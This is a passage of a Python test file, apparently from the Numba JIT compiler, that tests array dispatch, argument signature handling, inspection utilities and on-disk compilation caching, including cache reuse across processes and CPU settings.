C_contig_misaligned = tmp[1:].view(np.complex128).reshape(r, r)
F_contig_aligned = C_contig_aligned.T
F_contig_misaligned = C_contig_misaligned.T
# checking routine
def check(name, a):
a[:, :] = np.arange(n, dtype=np.complex128).reshape(r, r)
expected = foo(a)
got = jitfoo(a)
np.testing.assert_allclose(expected, got)
# The checks must be run in this order to create the dispatch key
# sequence that causes invalid dispatch noted in #2937.
# The first two should hit the cache as they are aligned, supported
# order and under 5 dimensions. The second two should end up in the
# fallback path as they are misaligned.
check("C_contig_aligned", C_contig_aligned)
check("F_contig_aligned", F_contig_aligned)
check("C_contig_misaligned", C_contig_misaligned)
check("F_contig_misaligned", F_contig_misaligned)
@unittest.skipIf(_is_armv7l, "Unaligned loads unsupported")
def test_immutability_in_array_dispatch(self):
# RO operation in function
def foo(a):
return np.sum(a)
jitfoo = jit(nopython=True)(foo)
n = 64
r = int(np.sqrt(n))
dt = np.int8
count = np.complex128().itemsize // dt().itemsize
tmp = np.arange(n * count + 1, dtype=dt)
        # create some arrays as the Cartesian product of:
# [F/C] x [aligned/misaligned]
C_contig_aligned = tmp[:-1].view(np.complex128).reshape(r, r)
C_contig_misaligned = tmp[1:].view(np.complex128).reshape(r, r)
F_contig_aligned = C_contig_aligned.T
F_contig_misaligned = C_contig_misaligned.T
# checking routine
def check(name, a, disable_write_bit=False):
a[:, :] = np.arange(n, dtype=np.complex128).reshape(r, r)
if disable_write_bit:
a.flags.writeable = False
expected = foo(a)
got = jitfoo(a)
np.testing.assert_allclose(expected, got)
# all of these should end up in the fallback path as they have no write
# bit set
check("C_contig_aligned", C_contig_aligned, disable_write_bit=True)
check("F_contig_aligned", F_contig_aligned, disable_write_bit=True)
check("C_contig_misaligned", C_contig_misaligned,
disable_write_bit=True)
check("F_contig_misaligned", F_contig_misaligned,
disable_write_bit=True)
@needs_lapack
@unittest.skipIf(_is_armv7l, "Unaligned loads unsupported")
def test_misaligned_high_dimension_array_dispatch(self):
def foo(a):
return np.linalg.matrix_power(a[0, 0, 0, 0, :, :], 1)
jitfoo = jit(nopython=True)(foo)
def check_properties(arr, layout, aligned):
self.assertEqual(arr.flags.aligned, aligned)
if layout == "C":
self.assertEqual(arr.flags.c_contiguous, True)
if layout == "F":
self.assertEqual(arr.flags.f_contiguous, True)
n = 729
r = 3
dt = np.int8
count = np.complex128().itemsize // dt().itemsize
tmp = np.arange(n * count + 1, dtype=dt)
        # create some arrays as the Cartesian product of:
# [F/C] x [aligned/misaligned]
C_contig_aligned = tmp[:-1].view(np.complex128).\
reshape(r, r, r, r, r, r)
check_properties(C_contig_aligned, 'C', True)
C_contig_misaligned = tmp[1:].view(np.complex128).\
reshape(r, r, r, r, r, r)
check_properties(C_contig_misaligned, 'C', False)
F_contig_aligned = C_contig_aligned.T
check_properties(F_contig_aligned, 'F', True)
F_contig_misaligned = C_contig_misaligned.T
check_properties(F_contig_misaligned, 'F', False)
# checking routine
def check(name, a):
a[:, :] = np.arange(n, dtype=np.complex128).\
reshape(r, r, r, r, r, r)
expected = foo(a)
got = jitfoo(a)
np.testing.assert_allclose(expected, got)
# these should all hit the fallback path as the cache is only for up to
# 5 dimensions
check("F_contig_misaligned", F_contig_misaligned)
check("C_contig_aligned", C_contig_aligned)
check("F_contig_aligned", F_contig_aligned)
check("C_contig_misaligned", C_contig_misaligned)
def test_dispatch_recompiles_for_scalars(self):
# for context #3612, essentially, compiling a lambda x:x for a
# numerically wide type (everything can be converted to a complex128)
# and then calling again with e.g. an int32 would lead to the int32
# being converted to a complex128 whereas it ought to compile an int32
# specialization.
def foo(x):
return x
# jit and compile on dispatch for 3 scalar types, expect 3 signatures
jitfoo = jit(nopython=True)(foo)
jitfoo(np.complex128(1 + 2j))
jitfoo(np.int32(10))
jitfoo(np.bool_(False))
self.assertEqual(len(jitfoo.signatures), 3)
expected_sigs = [(types.complex128,), (types.int32,), (types.bool_,)]
self.assertEqual(jitfoo.signatures, expected_sigs)
# now jit with signatures so recompilation is forbidden
# expect 1 signature and type conversion
jitfoo = jit([(types.complex128,)], nopython=True)(foo)
jitfoo(np.complex128(1 + 2j))
jitfoo(np.int32(10))
jitfoo(np.bool_(False))
self.assertEqual(len(jitfoo.signatures), 1)
expected_sigs = [(types.complex128,)]
self.assertEqual(jitfoo.signatures, expected_sigs)
class TestSignatureHandling(BaseTest):
"""
Test support for various parameter passing styles.
"""
@tag('important')
def test_named_args(self):
"""
Test passing named arguments to a dispatcher.
"""
f, check = self.compile_func(addsub)
check(3, z=10, y=4)
check(3, 4, 10)
check(x=3, y=4, z=10)
# All calls above fall under the same specialization
self.assertEqual(len(f.overloads), 1)
# Errors
with self.assertRaises(TypeError) as cm:
f(3, 4, y=6, z=7)
self.assertIn("too many arguments: expected 3, got 4",
str(cm.exception))
with self.assertRaises(TypeError) as cm:
f()
self.assertIn("not enough arguments: expected 3, got 0",
str(cm.exception))
with self.assertRaises(TypeError) as cm:
f(3, 4, y=6)
self.assertIn("missing argument 'z'", str(cm.exception))
def test_default_args(self):
"""
Test omitting arguments with a default value.
"""
f, check = self.compile_func(addsub_defaults)
check(3, z=10, y=4)
check(3, 4, 10)
check(x=3, y=4, z=10)
# Now omitting some values
check(3, z=10)
check(3, 4)
check(x=3, y=4)
check(3)
check(x=3)
# Errors
with self.assertRaises(TypeError) as cm:
f(3, 4, y=6, z=7)
self.assertIn("too many arguments: expected 3, got 4",
str(cm.exception))
with self.assertRaises(TypeError) as cm:
f()
self.assertIn("not enough arguments: expected at least 1, got 0",
str(cm.exception))
with self.assertRaises(TypeError) as cm:
f(y=6, z=7)
self.assertIn("missing argument 'x'", str(cm.exception))
def test_star_args(self):
"""
Test a compiled function with starargs in the signature.
"""
f, check = self.compile_func(star_defaults)
check(4)
check(4, 5)
check(4, 5, 6)
check(4, 5, 6, 7)
check(4, 5, 6, 7, 8)
check(x=4)
check(x=4, y=5)
check(4, y=5)
with self.assertRaises(TypeError) as cm:
f(4, 5, y=6)
self.assertIn("some keyword arguments unexpected", str(cm.exception))
with self.assertRaises(TypeError) as cm:
f(4, 5, z=6)
self.assertIn("some keyword arguments unexpected", str(cm.exception))
with self.assertRaises(TypeError) as cm:
f(4, x=6)
self.assertIn("some keyword arguments unexpected", str(cm.exception))
class TestSignatureHandlingObjectMode(TestSignatureHandling):
"""
    Same as TestSignatureHandling, but in object mode.
"""
jit_args = dict(forceobj=True)
class TestGeneratedDispatcher(TestCase):
"""
Tests for @generated_jit.
"""
@tag('important')
def test_generated(self):
f = generated_jit(nopython=True)(generated_usecase)
self.assertEqual(f(8), 8 - 5)
self.assertEqual(f(x=8), 8 - 5)
self.assertEqual(f(x=8, y=4), 8 - 4)
self.assertEqual(f(1j), 5 + 1j)
self.assertEqual(f(1j, 42), 42 + 1j)
self.assertEqual(f(x=1j, y=7), 7 + 1j)
@tag('important')
def test_generated_dtype(self):
f = generated_jit(nopython=True)(dtype_generated_usecase)
a = np.ones((10,), dtype=np.float32)
b = np.ones((10,), dtype=np.float64)
self.assertEqual(f(a, b).dtype, np.float64)
self.assertEqual(f(a, b, dtype=np.dtype('int32')).dtype, np.int32)
self.assertEqual(f(a, b, dtype=np.int32).dtype, np.int32)
def test_signature_errors(self):
"""
Check error reporting when implementation signature doesn't match
generating function signature.
"""
f = generated_jit(nopython=True)(bad_generated_usecase)
# Mismatching # of arguments
with self.assertRaises(TypeError) as raises:
f(1j)
self.assertIn("should be compatible with signature '(x, y=5)', "
"but has signature '(x)'",
str(raises.exception))
# Mismatching defaults
with self.assertRaises(TypeError) as raises:
f(1)
self.assertIn("should be compatible with signature '(x, y=5)', "
"but has signature '(x, y=6)'",
str(raises.exception))
class TestDispatcherMethods(TestCase):
def test_recompile(self):
closure = 1
@jit
def foo(x):
return x + closure
self.assertPreciseEqual(foo(1), 2)
self.assertPreciseEqual(foo(1.5), 2.5)
self.assertEqual(len(foo.signatures), 2)
closure = 2
self.assertPreciseEqual(foo(1), 2)
# Recompiling takes the new closure into account.
foo.recompile()
# Everything was recompiled
self.assertEqual(len(foo.signatures), 2)
self.assertPreciseEqual(foo(1), 3)
self.assertPreciseEqual(foo(1.5), 3.5)
def test_recompile_signatures(self):
# Same as above, but with an explicit signature on @jit.
closure = 1
@jit("int32(int32)")
def foo(x):
return x + closure
self.assertPreciseEqual(foo(1), 2)
self.assertPreciseEqual(foo(1.5), 2)
closure = 2
self.assertPreciseEqual(foo(1), 2)
# Recompiling takes the new closure into account.
foo.recompile()
self.assertPreciseEqual(foo(1), 3)
self.assertPreciseEqual(foo(1.5), 3)
@tag('important')
def test_inspect_llvm(self):
# Create a jited function
@jit
def foo(explicit_arg1, explicit_arg2):
return explicit_arg1 + explicit_arg2
# Call it in a way to create 3 signatures
foo(1, 1)
foo(1.0, 1)
foo(1.0, 1.0)
# base call to get all llvm in a dict
llvms = foo.inspect_llvm()
self.assertEqual(len(llvms), 3)
# make sure the function name shows up in the llvm
for llvm_bc in llvms.values():
# Look for the function name
self.assertIn("foo", llvm_bc)
# Look for the argument names
self.assertIn("explicit_arg1", llvm_bc)
self.assertIn("explicit_arg2", llvm_bc)
def test_inspect_asm(self):
# Create a jited function
@jit
def foo(explicit_arg1, explicit_arg2):
return explicit_arg1 + explicit_arg2
# Call it in a way to create 3 signatures
foo(1, 1)
foo(1.0, 1)
foo(1.0, 1.0)
# base call to get all llvm in a dict
asms = foo.inspect_asm()
self.assertEqual(len(asms), 3)
        # make sure the function name shows up in the asm
for asm in asms.values():
# Look for the function name
self.assertTrue("foo" in asm)
def _check_cfg_display(self, cfg, wrapper=''):
# simple stringify test
if wrapper:
wrapper = "{}{}".format(len(wrapper), wrapper)
module_name = __name__.split('.', 1)[0]
module_len = len(module_name)
prefix = r'^digraph "CFG for \'_ZN{}{}{}'.format(wrapper,
module_len,
module_name)
self.assertRegexpMatches(str(cfg), prefix)
# .display() requires an optional dependency on `graphviz`.
# just test for the attribute without running it.
self.assertTrue(callable(cfg.display))
def test_inspect_cfg(self):
# Exercise the .inspect_cfg(). These are minimal tests and do not fully
# check the correctness of the function.
@jit
def foo(the_array):
return the_array.sum()
# Generate 3 overloads
a1 = np.ones(1)
a2 = np.ones((1, 1))
a3 = np.ones((1, 1, 1))
foo(a1)
foo(a2)
foo(a3)
# Call inspect_cfg() without arguments
cfgs = foo.inspect_cfg()
# Correct count of overloads
self.assertEqual(len(cfgs), 3)
# Makes sure all the signatures are correct
[s1, s2, s3] = cfgs.keys()
self.assertEqual(set([s1, s2, s3]),
set(map(lambda x: (typeof(x),), [a1, a2, a3])))
for cfg in cfgs.values():
self._check_cfg_display(cfg)
self.assertEqual(len(list(cfgs.values())), 3)
# Call inspect_cfg(signature)
cfg = foo.inspect_cfg(signature=foo.signatures[0])
self._check_cfg_display(cfg)
def test_inspect_cfg_with_python_wrapper(self):
# Exercise the .inspect_cfg() including the python wrapper.
# These are minimal tests and do not fully check the correctness of
# the function.
@jit
def foo(the_array):
return the_array.sum()
# Generate 3 overloads
a1 = np.ones(1)
a2 = np.ones((1, 1))
a3 = np.ones((1, 1, 1))
foo(a1)
foo(a2)
foo(a3)
# Call inspect_cfg(signature, show_wrapper="python")
cfg = foo.inspect_cfg(signature=foo.signatures[0],
show_wrapper="python")
self._check_cfg_display(cfg, wrapper='cpython')
def test_inspect_types(self):
@jit
def foo(a, b):
return a + b
foo(1, 2)
# Exercise the method
foo.inspect_types(utils.StringIO())
# Test output
expected = str(foo.overloads[foo.signatures[0]].type_annotation)
with captured_stdout() as out:
foo.inspect_types()
assert expected in out.getvalue()
def test_inspect_types_with_signature(self):
@jit
def foo(a):
return a + 1
foo(1)
foo(1.0)
# Inspect all signatures
with captured_stdout() as total:
foo.inspect_types()
# Inspect first signature
with captured_stdout() as first:
foo.inspect_types(signature=foo.signatures[0])
# Inspect second signature
with captured_stdout() as second:
foo.inspect_types(signature=foo.signatures[1])
self.assertEqual(total.getvalue(), first.getvalue() + second.getvalue())
@unittest.skipIf(jinja2 is None, "please install the 'jinja2' package")
@unittest.skipIf(pygments is None, "please install the 'pygments' package")
def test_inspect_types_pretty(self):
@jit
def foo(a, b):
return a + b
foo(1, 2)
# Exercise the method, dump the output
with captured_stdout():
ann = foo.inspect_types(pretty=True)
# ensure HTML <span> is found in the annotation output
for k, v in ann.ann.items():
span_found = False
for line in v['pygments_lines']:
if 'span' in line[2]:
span_found = True
self.assertTrue(span_found)
# check that file+pretty kwarg combo raises
with self.assertRaises(ValueError) as raises:
foo.inspect_types(file=utils.StringIO(), pretty=True)
self.assertIn("`file` must be None if `pretty=True`",
str(raises.exception))
def test_get_annotation_info(self):
@jit
def foo(a):
return a + 1
foo(1)
foo(1.3)
expected = dict(chain.from_iterable(foo.get_annotation_info(i).items()
for i in foo.signatures))
result = foo.get_annotation_info()
self.assertEqual(expected, result)
def test_issue_with_array_layout_conflict(self):
"""
        This tests an issue with the dispatcher when an array that is both
        C and F contiguous is supplied for the first signature.
        The dispatcher checks for F contiguity first, but the compiler checks
        for C contiguity first. This resulted in C contiguous code being
        inserted as the F contiguous function.
"""
def pyfunc(A, i, j):
return A[i, j]
cfunc = jit(pyfunc)
ary_c_and_f = np.array([[1.]])
ary_c = np.array([[0., 1.], [2., 3.]], order='C')
ary_f = np.array([[0., 1.], [2., 3.]], order='F')
exp_c = pyfunc(ary_c, 1, 0)
exp_f = pyfunc(ary_f, 1, 0)
self.assertEqual(1., cfunc(ary_c_and_f, 0, 0))
got_c = cfunc(ary_c, 1, 0)
got_f = cfunc(ary_f, 1, 0)
self.assertEqual(exp_c, got_c)
self.assertEqual(exp_f, got_f)
class BaseCacheTest(TestCase):
# This class is also used in test_cfunc.py.
# The source file that will be copied
usecases_file = None
# Make sure this doesn't conflict with another module
modname = None
def setUp(self):
self.tempdir = temp_directory('test_cache')
sys.path.insert(0, self.tempdir)
self.modfile = os.path.join(self.tempdir, self.modname + ".py")
self.cache_dir = os.path.join(self.tempdir, "__pycache__")
shutil.copy(self.usecases_file, self.modfile)
self.maxDiff = None
def tearDown(self):
sys.modules.pop(self.modname, None)
sys.path.remove(self.tempdir)
def import_module(self):
# Import a fresh version of the test module. All jitted functions
# in the test module will start anew and load overloads from
# the on-disk cache if possible.
old = sys.modules.pop(self.modname, None)
if old is not None:
# Make sure cached bytecode is removed
if sys.version_info >= (3,):
cached = [old.__cached__]
else:
if old.__file__.endswith(('.pyc', '.pyo')):
cached = [old.__file__]
else:
cached = [old.__file__ + 'c', old.__file__ + 'o']
for fn in cached:
try:
os.unlink(fn)
except OSError as e:
if e.errno != errno.ENOENT:
raise
mod = import_dynamic(self.modname)
self.assertEqual(mod.__file__.rstrip('co'), self.modfile)
return mod
def cache_contents(self):
try:
return [fn for fn in os.listdir(self.cache_dir)
if not fn.endswith(('.pyc', ".pyo"))]
except OSError as e:
if e.errno != errno.ENOENT:
raise
return []
def get_cache_mtimes(self):
return dict((fn, os.path.getmtime(os.path.join(self.cache_dir, fn)))
for fn in sorted(self.cache_contents()))
def check_pycache(self, n):
c = self.cache_contents()
self.assertEqual(len(c), n, c)
def dummy_test(self):
pass
class BaseCacheUsecasesTest(BaseCacheTest):
here = os.path.dirname(__file__)
usecases_file = os.path.join(here, "cache_usecases.py")
modname = "dispatcher_caching_test_fodder"
def run_in_separate_process(self):
# Cached functions can be run from a distinct process.
# Also stresses issue #1603: uncached function calling cached function
# shouldn't fail compiling.
code = """if 1:
import sys
sys.path.insert(0, %(tempdir)r)
mod = __import__(%(modname)r)
mod.self_test()
""" % dict(tempdir=self.tempdir, modname=self.modname)
popen = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = popen.communicate()
if popen.returncode != 0:
raise AssertionError("process failed with code %s: "
"stderr follows\n%s\n"
% (popen.returncode, err.decode()))
def check_module(self, mod):
self.check_pycache(0)
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(2) # 1 index, 1 data
self.assertPreciseEqual(f(2.5, 3), 6.5)
self.check_pycache(3) # 1 index, 2 data
f = mod.add_objmode_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(5) # 2 index, 3 data
self.assertPreciseEqual(f(2.5, 3), 6.5)
self.check_pycache(6) # 2 index, 4 data
mod.self_test()
def check_hits(self, func, hits, misses=None):
st = func.stats
self.assertEqual(sum(st.cache_hits.values()), hits, st.cache_hits)
if misses is not None:
self.assertEqual(sum(st.cache_misses.values()), misses,
st.cache_misses)
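    # Illustrative note (not in the original test file): `func.stats` exposes
    # `cache_hits` and `cache_misses` as mappings keyed by compiled signature,
    # which is why the checks above sum over `.values()`. For example, after
    # one cached reload of a single int64 signature one might see something
    # like cache_hits == {(int64, int64): 1} (shape shown for illustration).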
class TestCache(BaseCacheUsecasesTest):
@tag('important')
def test_caching(self):
self.check_pycache(0)
mod = self.import_module()
self.check_pycache(0)
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(2) # 1 index, 1 data
self.assertPreciseEqual(f(2.5, 3), 6.5)
self.check_pycache(3) # 1 index, 2 data
self.check_hits(f, 0, 2)
f = mod.add_objmode_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(5) # 2 index, 3 data
self.assertPreciseEqual(f(2.5, 3), 6.5)
self.check_pycache(6) # 2 index, 4 data
self.check_hits(f, 0, 2)
f = mod.record_return
rec = f(mod.aligned_arr, 1)
self.assertPreciseEqual(tuple(rec), (2, 43.5))
rec = f(mod.packed_arr, 1)
self.assertPreciseEqual(tuple(rec), (2, 43.5))
self.check_pycache(9) # 3 index, 6 data
self.check_hits(f, 0, 2)
f = mod.generated_usecase
self.assertPreciseEqual(f(3, 2), 1)
self.assertPreciseEqual(f(3j, 2), 2 + 3j)
# Check the code runs ok from another process
self.run_in_separate_process()
@tag('important')
def test_caching_nrt_pruned(self):
self.check_pycache(0)
mod = self.import_module()
self.check_pycache(0)
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(2) # 1 index, 1 data
# NRT pruning may affect cache
self.assertPreciseEqual(f(2, np.arange(3)), 2 + np.arange(3) + 1)
self.check_pycache(3) # 1 index, 2 data
self.check_hits(f, 0, 2)
def test_inner_then_outer(self):
# Caching inner then outer function is ok
mod = self.import_module()
self.assertPreciseEqual(mod.inner(3, 2), 6)
self.check_pycache(2) # 1 index, 1 data
# Uncached outer function shouldn't fail (issue #1603)
f = mod.outer_uncached
self.assertPreciseEqual(f(3, 2), 2)
self.check_pycache(2) # 1 index, 1 data
mod = self.import_module()
f = mod.outer_uncached
self.assertPreciseEqual(f(3, 2), 2)
self.check_pycache(2) # 1 index, 1 data
# Cached outer will create new cache entries
f = mod.outer
self.assertPreciseEqual(f(3, 2), 2)
self.check_pycache(4) # 2 index, 2 data
self.assertPreciseEqual(f(3.5, 2), 2.5)
self.check_pycache(6) # 2 index, 4 data
def test_outer_then_inner(self):
# Caching outer then inner function is ok
mod = self.import_module()
self.assertPreciseEqual(mod.outer(3, 2), 2)
self.check_pycache(4) # 2 index, 2 data
self.assertPreciseEqual(mod.outer_uncached(3, 2), 2)
self.check_pycache(4) # same
mod = self.import_module()
f = mod.inner
self.assertPreciseEqual(f(3, 2), 6)
self.check_pycache(4) # same
self.assertPreciseEqual(f(3.5, 2), 6.5)
self.check_pycache(5) # 2 index, 3 data
def test_no_caching(self):
mod = self.import_module()
f = mod.add_nocache_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(0)
def test_looplifted(self):
# Loop-lifted functions can't be cached and raise a warning
mod = self.import_module()
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always', NumbaWarning)
f = mod.looplifted
self.assertPreciseEqual(f(4), 6)
self.check_pycache(0)
self.assertEqual(len(w), 1)
self.assertIn('Cannot cache compiled function "looplifted" '
'as it uses lifted loops', str(w[0].message))
def test_big_array(self):
        # Code referencing big array globals cannot be cached
mod = self.import_module()
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always', NumbaWarning)
f = mod.use_big_array
np.testing.assert_equal(f(), mod.biggie)
self.check_pycache(0)
self.assertEqual(len(w), 1)
self.assertIn('Cannot cache compiled function "use_big_array" '
'as it uses dynamic globals', str(w[0].message))
def test_ctypes(self):
# Functions using a ctypes pointer can't be cached and raise
# a warning.
mod = self.import_module()
for f in [mod.use_c_sin, mod.use_c_sin_nest1, mod.use_c_sin_nest2]:
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always', NumbaWarning)
self.assertPreciseEqual(f(0.0), 0.0)
self.check_pycache(0)
self.assertEqual(len(w), 1)
self.assertIn(
'Cannot cache compiled function "{}"'.format(f.__name__),
str(w[0].message),
)
def test_closure(self):
mod = self.import_module()
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always', NumbaWarning)
f = mod.closure1
self.assertPreciseEqual(f(3), 6)
f = mod.closure2
self.assertPreciseEqual(f(3), 8)
self.check_pycache(0)
self.assertEqual(len(w), 2)
for item in w:
self.assertIn('Cannot cache compiled function "closure"',
str(item.message))
def test_cache_reuse(self):
mod = self.import_module()
mod.add_usecase(2, 3)
mod.add_usecase(2.5, 3.5)
mod.add_objmode_usecase(2, 3)
mod.outer_uncached(2, 3)
mod.outer(2, 3)
mod.record_return(mod.packed_arr, 0)
mod.record_return(mod.aligned_arr, 1)
mod.generated_usecase(2, 3)
mtimes = self.get_cache_mtimes()
# Two signatures compiled
self.check_hits(mod.add_usecase, 0, 2)
mod2 = self.import_module()
self.assertIsNot(mod, mod2)
f = mod2.add_usecase
f(2, 3)
self.check_hits(f, 1, 0)
f(2.5, 3.5)
self.check_hits(f, 2, 0)
f = mod2.add_objmode_usecase
f(2, 3)
self.check_hits(f, 1, 0)
# The files haven't changed
self.assertEqual(self.get_cache_mtimes(), mtimes)
self.run_in_separate_process()
self.assertEqual(self.get_cache_mtimes(), mtimes)
def test_cache_invalidate(self):
mod = self.import_module()
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
# This should change the functions' results
with open(self.modfile, "a") as f:
f.write("\nZ = 10\n")
mod = self.import_module()
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 15)
f = mod.add_objmode_usecase
self.assertPreciseEqual(f(2, 3), 15)
def test_recompile(self):
# Explicit call to recompile() should overwrite the cache
mod = self.import_module()
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
mod = self.import_module()
f = mod.add_usecase
mod.Z = 10
self.assertPreciseEqual(f(2, 3), 6)
f.recompile()
self.assertPreciseEqual(f(2, 3), 15)
# Freshly recompiled version is re-used from other imports
mod = self.import_module()
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 15)
def test_same_names(self):
        # Functions with the same name should still be disambiguated
mod = self.import_module()
f = mod.renamed_function1
self.assertPreciseEqual(f(2), 4)
f = mod.renamed_function2
self.assertPreciseEqual(f(2), 8)
def test_frozen(self):
from .dummy_module import function
old_code = function.__code__
code_obj = compile('pass', 'tests/dummy_module.py', 'exec')
try:
function.__code__ = code_obj
source = inspect.getfile(function)
            # from_function() returns None here: the module cannot be found
            # on disk and the executable is not frozen
locator = _UserWideCacheLocator.from_function(function, source)
self.assertIsNone(locator)
sys.frozen = True
# returns a cache locator object, only works when the executable
# is frozen
locator = _UserWideCacheLocator.from_function(function, source)
self.assertIsInstance(locator, _UserWideCacheLocator)
finally:
function.__code__ = old_code
del sys.frozen
def _test_pycache_fallback(self):
"""
With a disabled __pycache__, test there is a working fallback
(e.g. on the user-wide cache dir)
"""
mod = self.import_module()
f = mod.add_usecase
# Remove this function's cache files at the end, to avoid accumulation
# across test calls.
self.addCleanup(shutil.rmtree, f.stats.cache_path, ignore_errors=True)
self.assertPreciseEqual(f(2, 3), 6)
# It's a cache miss since the file was copied to a new temp location
self.check_hits(f, 0, 1)
# Test re-use
mod2 = self.import_module()
f = mod2.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_hits(f, 1, 0)
# The __pycache__ is empty (otherwise the test's preconditions
# wouldn't be met)
self.check_pycache(0)
@skip_bad_access
@unittest.skipIf(os.name == "nt",
"cannot easily make a directory read-only on Windows")
def test_non_creatable_pycache(self):
# Make it impossible to create the __pycache__ directory
old_perms = os.stat(self.tempdir).st_mode
os.chmod(self.tempdir, 0o500)
self.addCleanup(os.chmod, self.tempdir, old_perms)
self._test_pycache_fallback()
@skip_bad_access
@unittest.skipIf(os.name == "nt",
"cannot easily make a directory read-only on Windows")
def test_non_writable_pycache(self):
# Make it impossible to write to the __pycache__ directory
pycache = os.path.join(self.tempdir, '__pycache__')
os.mkdir(pycache)
old_perms = os.stat(pycache).st_mode
os.chmod(pycache, 0o500)
self.addCleanup(os.chmod, pycache, old_perms)
self._test_pycache_fallback()
def test_ipython(self):
# Test caching in an IPython session
base_cmd = [sys.executable, '-m', 'IPython']
base_cmd += ['--quiet', '--quick', '--no-banner', '--colors=NoColor']
try:
ver = subprocess.check_output(base_cmd + ['--version'])
except subprocess.CalledProcessError as e:
self.skipTest("ipython not available: return code %d"
% e.returncode)
ver = ver.strip().decode()
print("ipython version:", ver)
# Create test input
inputfn = os.path.join(self.tempdir, "ipython_cache_usecase.txt")
with open(inputfn, "w") as f:
f.write(r"""
import os
import sys
from numba import jit
# IPython 5 does not support multiline input if stdin isn't
# a tty (https://github.com/ipython/ipython/issues/9752)
f = jit(cache=True)(lambda: 42)
res = f()
# IPython writes on stdout, so use stderr instead
sys.stderr.write(u"cache hits = %d\n" % f.stats.cache_hits[()])
# IPython hijacks sys.exit(), bypass it
sys.stdout.flush()
sys.stderr.flush()
os._exit(res)
""")
def execute_with_input():
# Feed the test input as stdin, to execute it in REPL context
with open(inputfn, "rb") as stdin:
p = subprocess.Popen(base_cmd, stdin=stdin,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True)
out, err = p.communicate()
if p.returncode != 42:
self.fail("unexpected return code %d\n"
"-- stdout:\n%s\n"
"-- stderr:\n%s\n"
% (p.returncode, out, err))
return err
execute_with_input()
# Run a second time and check caching
err = execute_with_input()
self.assertIn("cache hits = 1", err.strip())
@skip_parfors_unsupported
class TestSequentialParForsCache(BaseCacheUsecasesTest):
def setUp(self):
super(TestSequentialParForsCache, self).setUp()
# Turn on sequential parfor lowering
parfor.sequential_parfor_lowering = True
def tearDown(self):
super(TestSequentialParForsCache, self).tearDown()
# Turn off sequential parfor lowering
parfor.sequential_parfor_lowering = False
def test_caching(self):
mod = self.import_module()
self.check_pycache(0)
f = mod.parfor_usecase
ary = np.ones(10)
self.assertPreciseEqual(f(ary), ary * ary + ary)
dynamic_globals = [cres.library.has_dynamic_globals
for cres in f.overloads.values()]
self.assertEqual(dynamic_globals, [False])
self.check_pycache(2) # 1 index, 1 data
class TestCacheWithCpuSetting(BaseCacheUsecasesTest):
# Disable parallel testing due to envvars modification
_numba_parallel_test_ = False
def check_later_mtimes(self, mtimes_old):
match_count = 0
for k, v in self.get_cache_mtimes().items():
if k in mtimes_old:
self.assertGreaterEqual(v, mtimes_old[k])
match_count += 1
self.assertGreater(match_count, 0,
msg='nothing to compare')
def test_user_set_cpu_name(self):
self.check_pycache(0)
mod = self.import_module()
mod.self_test()
cache_size = len(self.cache_contents())
mtimes = self.get_cache_mtimes()
# Change CPU name to generic
with override_env_config('NUMBA_CPU_NAME', 'generic'):
self.run_in_separate_process()
self.check_later_mtimes(mtimes)
self.assertGreater(len(self.cache_contents()), cache_size)
# Check cache index
cache = mod.add_usecase._cache
cache_file = cache._cache_file
cache_index = cache_file._load_index()
self.assertEqual(len(cache_index), 2)
[key_a, key_b] = cache_index.keys()
if key_a[1][1] == ll.get_host_cpu_name():
key_host, key_generic = key_a, key_b
else:
key_host, key_generic = key_b, key_a
self.assertEqual(key_host[1][1], ll.get_host_cpu_name())
self.assertEqual(key_host[1][2], codegen.get_host_cpu_features())
self.assertEqual(key_generic[1][1], 'generic')
self.assertEqual(key_generic[1][2], '')
def test_user_set_cpu_features(self):
self.check_pycache(0)
mod = self.import_module()
mod.self_test()
cache_size = len(self.cache_contents())
mtimes = self.get_cache_mtimes()
# Change CPU feature
my_cpu_features = '-sse;-avx'
system_features = codegen.get_host_cpu_features()
self.assertNotEqual(system_features, my_cpu_features)
with override_env_config('NUMBA_CPU_FEATURES', my_cpu_features):
self.run_in_separate_process()
self.check_later_mtimes(mtimes)
self.assertGreater(len(self.cache_contents()), cache_size)
# Check cache index
cache = mod.add_usecase._cache
cache_file = cache._cache_file
cache_index = cache_file._load_index()
self.assertEqual(len(cache_index), 2)
[key_a, key_b] = cache_index.keys()
if key_a[1][2] == system_features:
key_host, key_generic = key_a, key_b
else:
key_host, key_generic = key_b, key_a
self.assertEqual(key_host[1][1], ll.get_host_cpu_name())
self.assertEqual(key_host[1][2], system_features)
self.assertEqual(key_generic[1][1], ll.get_host_cpu_name())
self.assertEqual(key_generic[1][2], my_cpu_features)
class TestMultiprocessCache(BaseCacheTest):
# Nested multiprocessing.Pool raises AssertionError:
# "daemonic processes are not allowed to have children"
_numba_parallel_test_ = False
here = os.path.dirname(__file__)
usecases_file = os.path.join(here, "cache_usecases.py")
modname = "dispatcher_caching_test_fodder"
def test_multiprocessing(self):
# Check caching works from multiple processes at once (#2028)
mod = self.import_module()
# Calling a pure Python caller of the JIT-compiled function is
# necessary to reproduce the issue.
f = mod.simple_usecase_caller
n = 3
try:
ctx = multiprocessing.get_context('spawn')
except AttributeError:
ctx = multiprocessing
pool = ctx.Pool(n)
try:
res = sum(pool.imap(f, range(n)))
finally:
pool.close()
self.assertEqual(res, n * (n - 1) // 2)
class TestCacheFileCollision(unittest.TestCase):
_numba_parallel_test_ = False
here = os.path.dirname(__file__)
usecases_file = os.path.join(here, "cache_usecases.py")
